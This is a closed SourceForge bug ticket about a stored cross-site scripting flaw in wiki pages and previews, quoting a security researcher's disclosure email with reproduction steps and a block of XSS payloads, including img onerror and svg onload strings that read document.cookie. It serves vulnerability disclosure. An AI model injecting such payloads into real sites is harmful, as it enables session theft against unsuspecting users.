---
**[tickets:#7528] XSS on wiki page and preview**
**Status:** closed
**Milestone:** asf_release_1.2.0
**Labels:** security p1 sf-2
**Created:** Thu Jul 03, 2014 12:31 PM UTC by Chris Tsai
**Last Updated:** Mon Jan 05, 2015 12:03 AM UTC
**Owner:** Dave Brondsema
Confirmed and reproduced here:
https://sourceforge.net/p/strawhat/private-wiki/Swapnil_XSS/
***This also affects live wiki pages, not just the previews***
Original message from user, Swapnil Thaware:
>Respected Authorities,
>My name is Swapnil A. Thaware and I am a Security Researcher from India. I
>have found a security vulnerability in sourceforge.net. Here I am giving the
>details of the vulnerability found in sourceforge.net.
>Vulnerability : Stored XSS
>Vulnerability Description : Cross-Site Scripting (XSS) attacks are a type of
>injection, in which malicious scripts are injected into otherwise benign and
>trusted web sites. XSS attacks occur when an attacker uses a web application
>to send malicious code, generally in the form of a browser side script, to a
>different end user. Flaws that allow these attacks to succeed are quite
>widespread and occur anywhere a web application uses input from a user within
>the output it generates without validating or encoding it.
>An attacker can use XSS to send a malicious script to an unsuspecting user.
>The end user’s browser has no way to know that the script should not be
>trusted, and will execute the script. Because it thinks the script came from a
>trusted source, the malicious script can access any cookies, session tokens,
>or other sensitive information retained by the browser and used with that
>site. These scripts can even rewrite the content of the HTML page.
>Steps to Reproduce :
>1) Login to Account
>2) Go to wiki Section then Click on Create Page
>3) Write a name
>4) and then put XSS Payload in Content box then click on Preview button.
>5) Boooommmm !! we get the popup
>XSS Payload :
~~~~
<body onLoad=confirm(0)> "><svg/onload=alert(document.cookie)> ">"<img src=x
onerror=prompt(document.domain)>"> "><ScRiPt>alert("Hami Hax")<%2FScRiPt>
"><img src=x onerror=prompt('Xss');> “><img src=x
onerror=alert(document.cookie)>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
~~~~
>POC : I added a screenshot in attachment, please kindly check the attachment.
>Kindly let me know when the vulnerability is fixed and I am eligible for any
>acknowledgement or any reward.
---